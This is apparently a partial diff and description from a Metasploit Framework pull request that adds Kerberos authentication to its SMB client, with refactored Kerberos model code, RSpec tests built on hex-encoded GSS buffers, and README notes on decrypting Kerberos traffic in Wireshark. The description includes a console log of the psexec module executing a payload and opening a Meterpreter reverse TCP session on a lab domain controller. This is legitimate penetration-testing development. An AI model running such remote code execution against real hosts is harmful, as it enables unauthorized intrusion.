+      option_names = %w[SMBUser FtpUser Username user USER USERNAME username]
       option_names.each do |option_name|
         if datastore.options.include?(option_name)
           result[option_name] = username

--- a/lib/msf/ui/console/module_argument_parsing.rb
+++ b/lib/msf/ui/console/module_argument_parsing.rb
@@ -163,7 +163,7 @@ module ModuleArgumentParsing
   def resembles_datastore_assignment?(val)
     return false unless val
 
-    valid_option_regex = /^\w+=.*/
+    valid_option_regex = /^(\w|::)+=.*/
     valid_option_regex.match?(val)
   end
 

--- a/lib/rex/proto/gss.rb
+++ b/lib/rex/proto/gss.rb
@@ -1,0 +1,7 @@
+# -*- coding: binary -*-
+
+module Rex::Proto::Gss
+  OID_SPNEGO = OpenSSL::ASN1::ObjectId.new('1.3.6.1.5.5.2')
+  OID_MICROSOFT_KERBEROS_5 = OpenSSL::ASN1::ObjectId.new('1.2.840.48018.1.2.2')
+  OID_KERBEROS_5 = OpenSSL::ASN1::ObjectId.new('1.2.840.113554.1.2.2')
+end

--- a/lib/rex/proto/kerberos/README.md
+++ b/lib/rex/proto/kerberos/README.md
@@ -47,8 +47,14 @@ tgs-req
 To decrypt this Kerberos blob create a keytab on your Windows domain controller for the user that is requesting a Kerberos ticket:
 
 ```
-ktpass /crypto All /princ dc3.adf3.local/a@ADF3.LOCAL /pass p4$$w0rd /out demo.keytab /ptype KRB5_NT_PRINCIPAL
+ktpass /crypto All /princ Administrator@ADF3.LOCAL /pass p4$$w0rd /out demo.keytab /ptype KRB5_NT_PRINCIPAL
 ```
+
+Debugging steps:
+- If the password contains `$` it is easier to run the `ktpass` command in `cmd` rather than `powershell` to avoid variable substitution
+- If there is a `Missing keytype 18` warning for `etype: eTYPE-AES256-CTS-HMAC-SHA1-96 (18)` - verify that the principal name is correct within the ktpass generation command
+  - This should match the initial AS-REQ KRB ERROR salt, found in `krb-error` -> `edata` -> `ETYPE-INFO2-ENTRY` -> `salt`
+- Wireshark on Linux may not show the decrypted packet information in the packet details pane, instead it appears as a separate tab in the packet bytes pane
 
 Next go to Wireshark Preferences -> Protocols -> KRB5 and modify the following options:
 - Set `try to decrypt Kerberos blobs` to true

--- a/lib/rex/proto/kerberos/model/ap_req.rb
+++ b/lib/rex/proto/kerberos/model/ap_req.rb
@@ -36,17 +36,23 @@ module Rex
           #
           # @return [String]
           def encode
+            to_asn1.to_der
+          end
+
+          # @return [OpenSSL::ASN1::ASN1Data] The ap_req ASN1Data
+          def to_asn1
             elems = []
+
             elems << OpenSSL::ASN1::ASN1Data.new([encode_pvno], 0, :CONTEXT_SPECIFIC)
             elems << OpenSSL::ASN1::ASN1Data.new([encode_msg_type], 1, :CONTEXT_SPECIFIC)
             elems << OpenSSL::ASN1::ASN1Data.new([encode_options], 2, :CONTEXT_SPECIFIC)
             elems << OpenSSL::ASN1::ASN1Data.new([encode_ticket], 3, :CONTEXT_SPECIFIC)
             elems << OpenSSL::ASN1::ASN1Data.new([encode_authenticator], 4, :CONTEXT_SPECIFIC)
+
             seq = OpenSSL::ASN1::Sequence.new(elems)
 
             seq_asn1 = OpenSSL::ASN1::ASN1Data.new([seq], AP_REQ, :APPLICATION)
-
-            seq_asn1.to_der
+            seq_asn1
           end
 
           private

--- a/lib/rex/proto/kerberos/model/authenticator.rb
+++ b/lib/rex/proto/kerberos/model/authenticator.rb
@@ -32,6 +32,9 @@ module Rex
           #   @return [Rex::Proto::Kerberos::Model::EncryptionKey] the client's choice for an encryption
           #   key which is to be used to protect this specific application session
           attr_accessor :subkey
+          # @!attribute enc_key_usage
+          #   @return [Rex::Proto::Kerberos::Crypto::KeyUsage,Integer] The enc key usage number for this authenticator
+          attr_accessor :enc_key_usage
 
           # Rex::Proto::Kerberos::Model::Authenticator decoding isn't supported
           #
@@ -66,9 +69,11 @@ module Rex
           # @return [String] the encrypted result
           # @raise [NotImplementedError] if the encryption schema isn't supported
           def encrypt(etype, key)
+            raise ::Rex::Proto::Kerberos::Model::Error::KerberosError, 'Missing enc_key_usage' unless enc_key_usage
+
             data = self.encode
             encryptor = Rex::Proto::Kerberos::Crypto::Encryption::from_etype(etype)
-            encryptor.encrypt(data, key, Rex::Proto::Kerberos::Crypto::KeyUsage::TGS_REQ_PA_TGS_REQ_AP_REQ_AUTHENTICATOR)
+            encryptor.encrypt(data, key, enc_key_usage)
           end
 
 

--- a/lib/rex/proto/smb/simple_client.rb
+++ b/lib/rex/proto/smb/simple_client.rb
@@ -43,6 +43,7 @@ attr_accessor :socket, :client, :direct, :shares, :last_share, :versions
                                         smb3: self.versions.include?(3),
                                         always_encrypt: always_encrypt
                     )
+
       self.client.evasion_opts = {
         # Padding is performed between packet headers and data
         'pad_data' => EVADE::EVASION_NONE,
@@ -101,9 +102,10 @@ attr_accessor :socket, :client, :direct, :shares, :last_share, :versions
     rescue ::Interrupt
       raise $!
     rescue ::Exception => e
+      elog(e)
       n = XCEPT::LoginError.new
       n.source = e
-      if(e.respond_to?('error_code'))
+      if e.respond_to?('error_code') && e.respond_to?('get_error')
         n.error_code   = e.error_code
         n.error_reason = e.get_error(e.error_code)
       end

--- a/modules/auxiliary/admin/kerberos/ms14_068_kerberos_checksum.rb
+++ b/modules/auxiliary/admin/kerberos/ms14_068_kerberos_checksum.rb
@@ -40,7 +40,7 @@ class MetasploitModule < Msf::Auxiliary
 
     register_options(
       [
-        OptString.new('USER', [ true, 'The Domain User' ]),
+        OptString.new('USERNAME', [ true, 'The Domain User' ], aliases: ['USER']),
         OptString.new('PASSWORD', [ true, 'The Domain User password' ]),
         OptString.new('DOMAIN', [ true, 'The Domain (upper case) Ex: DEMO.LOCAL' ]),
         OptString.new('USER_SID', [ true, 'The Domain User SID, Ex: S-1-5-21-1755879683-3641577184-3486455962-1000'])
@@ -75,7 +75,7 @@ class MetasploitModule < Msf::Auxiliary
 
     print_status("#{peer} - Sending AS-REQ...")
     res = send_request_as(
-      client_name: "#{datastore['USER']}",
+      client_name: "#{datastore['USERNAME']}",
       server_name: "krbtgt/#{domain}",
       realm: "#{domain}",
       key: password_digest,

--- a/spec/lib/msf/core/exploit/remote/kerberos/service_authenticator/base_spec.rb
+++ b/spec/lib/msf/core/exploit/remote/kerberos/service_authenticator/base_spec.rb
@@ -1,0 +1,49 @@
+# -*- coding:binary -*-
+require 'spec_helper'
+
+RSpec.describe Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base do
+  subject do
+    described_class.new(
+      realm: 'demo.local',
+      hostname: 'mock_hostname',
+      username: 'mock_username',
+      password: 'mock_password',
+      host: 'mock_host',
+      port: 88,
+      timeout: 25,
+      framework: instance_double(::Msf::Framework),
+      framework_module: instance_double(::Msf::Module)
+    )
+  end
+
+  describe "#validate_response!" do
+    context 'when the response is a success' do
+      let(:response) do
+        "\xa1\x14\x30\x12\xa0\x03\x0a\x01\x00\xa1\x0b\x06\x09\x2a\x86\x48" \
+        "\x82\xf7\x12\x01\x02\x02"
+      end
+
+      it 'returns true' do
+        expect(subject.validate_response!(response)).to be true
+      end
+    end
+
+    context 'when the response is accept-incomplete and contains a kerberos error' do
+      let(:response) do
+        "\xa1\x81\x89\x30\x81\x86\xa0\x03\x0a\x01\x01\xa1\x0b\x06\x09\x2a" \
+        "\x86\x48\x82\xf7\x12\x01\x02\x02\xa2\x72\x04\x70\x60\x6e\x06\x09" \
+        "\x2a\x86\x48\x86\xf7\x12\x01\x02\x02\x03\x00\x7e\x5f\x30\x5d\xa0" \
+        "\x03\x02\x01\x05\xa1\x03\x02\x01\x1e\xa4\x11\x18\x0f\x32\x30\x32" \
+        "\x32\x30\x36\x32\x39\x32\x33\x32\x32\x31\x31\x5a\xa5\x05\x02\x03" \
+        "\x0e\x45\xd0\xa6\x03\x02\x01\x3c\xa9\x0c\x1b\x0a\x41\x44\x46\x33" \
+        "\x2e\x4c\x4f\x43\x41\x4c\xaa\x11\x30\x0f\xa0\x03\x02\x01\x01\xa1" \
+        "\x08\x30\x06\x1b\x04\x64\x63\x33\x24\xac\x11\x04\x0f\x30\x0d\xa1" \
+        "\x03\x02\x01\x01\xa2\x06\x04\x04\x6d\x00\x00\xc0"
+      end
+
+      it 'raises a Kerberos exception' do
+        expect { subject.validate_response!(response) }.to raise_error(::Rex::Proto::Kerberos::Model::Error::KerberosError, /Failed to negotiate/)
+      end
+    end
+  end
+end

--- a/spec/lib/msf/core/exploit/remote/smb/client/kerberos_authentication_spec.rb
+++ b/spec/lib/msf/core/exploit/remote/smb/client/kerberos_authentication_spec.rb
@@ -1,0 +1,99 @@
+# -*- coding: binary -*-
+
+require 'rspec'
+
+RSpec.describe Msf::Exploit::Remote::SMB::Client::KerberosAuthentication do
+  let(:mock_authenticator) do
+    instance_double(Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::SMB)
+  end
+
+  let(:smb1) { true }
+  let(:smb2) { true }
+  let(:smb3) { true }
+
+  subject do
+    mock_dispatcher = instance_double(RubySMB::Dispatcher::Base, is_a?: true)
+    allow(mock_dispatcher).to receive(:is_a?).with(RubySMB::Dispatcher::Base).and_return(true)
+
+    smb_client = ::RubySMB::Client.new(
+      mock_dispatcher,
+      username: '',
+      password: '',
+      smb1: smb1,
+      smb2: smb2,
+      smb3: smb3
+    )
+    smb_client.extend(Msf::Exploit::Remote::SMB::Client::KerberosAuthentication)
+    smb_client.kerberos_authenticator = mock_authenticator
+    smb_client
+  end
+
+  before(:each) do
+    allow(subject).to receive(:negotiation_security_buffer).and_return(negotiation_security_buffer)
+  end
+
+  context 'when kerberos is not supported' do
+    let(:negotiation_security_buffer) do
+      "\x60\x28\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x1e\x30\x1c\xa0\x1a" \
+      "\x30\x18\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x1e\x06\x0a" \
+      "\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a"
+    end
+
+    let(:smb1) { true }
+
+    describe '#authenticate' do
+      it 'raises an error' do
+        expect { subject.authenticate }.to raise_error ::RubySMB::Error::AuthenticationFailure, /Unable to negotiate kerberos/
+      end
+    end
+  end
+
+  context 'when Kerberos is supported' do
+    let(:negotiation_security_buffer) do
+      "\x60\x76\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x6c\x30\x6a\xa0\x3c" \
+      "\x30\x3a\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x1e\x06\x09" \
+      "\x2a\x86\x48\x82\xf7\x12\x01\x02\x02\x06\x09\x2a\x86\x48\x86\xf7" \
+      "\x12\x01\x02\x02\x06\x0a\x2a\x86\x48\x86\xf7\x12\x01\x02\x02\x03" \
+      "\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a\xa3\x2a\x30\x28" \
+      "\xa0\x26\x1b\x24\x6e\x6f\x74\x5f\x64\x65\x66\x69\x6e\x65\x64\x5f" \
+      "\x69\x6e\x5f\x52\x46\x43\x34\x31\x37\x38\x40\x70\x6c\x65\x61\x73" \
+      "\x65\x5f\x69\x67\x6e\x6f\x72\x65"
+    end
+
+    describe '#authenticate' do
+      context 'when smb1' do
+        let(:smb1) { true }
+        let(:smb2) { false }
+        let(:smb3) { false }
+
+        describe '#authenticate' do
+          before(:each) do
+            allow(subject).to receive(:smb1_authenticate)
+            subject.authenticate
+          end
+
+          it 'calls smb1_authenticate' do
+            expect(subject).to have_received(:smb1_authenticate)
+          end
+        end
+      end
+
+      context 'when smb2' do
+        let(:smb1) { false }
+        let(:smb2) { true }
+        let(:smb3) { false }
+
+        describe '#authenticate' do
+          before(:each) do
+            allow(subject).to receive(:smb2_authenticate)
+            subject.authenticate
+          end
+
+          it 'calls smb2_authenticate' do
+            expect(subject).to have_received(:smb2_authenticate)
+          end
+        end
+      end
+    end
+  end
+end

--- a/spec/msf/ui/console/module_argument_parsing_spec.rb
+++ b/spec/msf/ui/console/module_argument_parsing_spec.rb
@@ -37,6 +37,24 @@ RSpec.shared_examples_for 'a command which parses datastore values' do |opts|
       expect(subject.send(opts[:method_name], ['-o', 'RHOSTS=192.168.172.1'])).to include(expected_result)
     end
 
+    it 'allows setting namespaced datastore options' do
+      expected_result = {
+        datastore_options: {
+          'SMB::PROTOCOLVERSION' => '1,2'
+        }
+      }
+      expect(subject.send(opts[:method_name], ['SMB::ProtocolVersion=1,2'])).to include(expected_result)
+    end
+
+    it 'allows setting datastore options with underscores' do
+      expected_result = {
+        datastore_options: {
+          'USER_FILE' => './example.txt'
+        }
+      }
+      expect(subject.send(opts[:method_name], ['user_file=./example.txt'])).to include(expected_result)
+    end
+
     it 'allows setting multiple options individually' do
       expected_result = {
         datastore_options: {


### PR DESCRIPTION
Add initial SMB kerberos authentication support; Builds upon the work of:

- Add Kerberos LoginScanner support - https://github.com/rapid7/metasploit-framework/pull/16625
- Fix Kerberos flags decoding logic - https://github.com/rapid7/metasploit-framework/pull/16660
- Track negotiation security buffer - https://github.com/rapid7/ruby_smb/pull/229

### Example

psexec working via Kerberos authentication:

```
msf6 exploit(windows/smb/psexec) > rerun rhosts=192.168.123.136 domaincontrollerrhost=192.168.123.136 smbrhostname=dc3.adf3.local smbuser=test_unconstrained smbpass=p4$$w0rd smbdomain=adf3.local smbauth=kerberos smb::AlwaysEncrypt=false SMB::ProtocolVersion=1,2,3
[*] Reloading module...

[*] Started reverse TCP handler on 192.168.1.239:4444 
[*] 192.168.123.136:445 - Connecting to the server...
[*] 192.168.123.136:445 - Authenticating to 192.168.123.136:445|adf3.local as user 'test_unconstrained'...
[+] 192.168.123.136:88 - Valid TGS-Response, extracting credentials...
[+] 192.168.123.136:88 - MIT Credential Cache saved to ~/.msf4/loot/20220623134914_default_192.168.123.136_windows.kerberos_130728.bin
[*] 192.168.123.136:445 - Selecting PowerShell target
[*] 192.168.123.136:445 - Executing the payload...
[+] 192.168.123.136:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (175686 bytes) to 192.168.1.239
[*] Meterpreter session 5 opened (192.168.1.239:4444 -> 192.168.1.239:51940) at 2022-06-23 13:49:17 +0100

meterpreter > 
```

### Wireshark

Wireshark showing the TGT/TGS handshake, and the AP Req as part of the smb session setup

<img width="1456" alt="image" src="https://user-images.githubusercontent.com/60357436/173250454-35815bcf-856b-4a37-abaf-adb9128a7f99.png">

## Verification

When testing the various Kerberos modules, we should ensure the following scenarios:

Run modules against the following accounts:
- Valid account
  - Invalid account
  - Locked/Disabled account
  - Account with expired password
  - Accounts with spaces
  - Accounts with preauthentication turned off
  - Ensure clock skew issues are bubbled up to the user, i.e. outputting local time vs server time to the user.
- Ensure invalid realms are handled correctly, i.e. reporting to the user that the realm is invalid. Auth brute modules should not - continue brute forcing in this scenario.
- Ensure DNS resolving issues are covered, i.e. manually specifying rhost/domain controller IPs
- Ensure modules can run through a pivoted target
vEnsure John hashes can be cracked
- Ensure documentation is up to date

SMB
- SMB 1 / 2 / 3
- SMB Encryption
- Remote host not supporting Kerberos Authentication
- Ensure NTLM authentication continues to work
- Logoff works

Minimal test targets:
- Windows server 2008
- Windows server 2012
- Windows server 2016
- Windows server 2022
- Verify behavior against Linux targets